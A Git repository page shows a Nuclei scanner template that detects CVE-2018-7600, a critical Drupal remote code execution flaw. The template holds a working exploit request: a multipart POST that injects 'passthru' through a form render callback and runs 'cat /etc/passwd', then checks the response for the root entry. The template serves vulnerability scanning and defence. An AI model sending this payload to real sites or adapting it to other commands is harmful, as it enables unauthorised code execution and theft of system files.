daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2018/CVE-2018-7600.yaml

72 lines
2.3 KiB
YAML
Raw Blame History

id: CVE-2018-7600
info:
name: Drupal - Remote Code Execution
author: pikpikcu
severity: critical
description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
reference:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
- https://www.drupal.org/sa-core-2018-002
- https://groups.drupal.org/security/faq-2018-002
- http://www.securitytracker.com/id/1040598
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7600
cwe-id: CWE-20
epss-score: 0.9757
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.component:"drupal"
vendor: drupal
product: drupal
tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive
http:
- raw:
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Referer: {{Hostname}}/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"
matchers-condition: and
matchers:
- type: word
part: header
words:
- application/json
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
Reference in New Issue View Git Blame Copy Permalink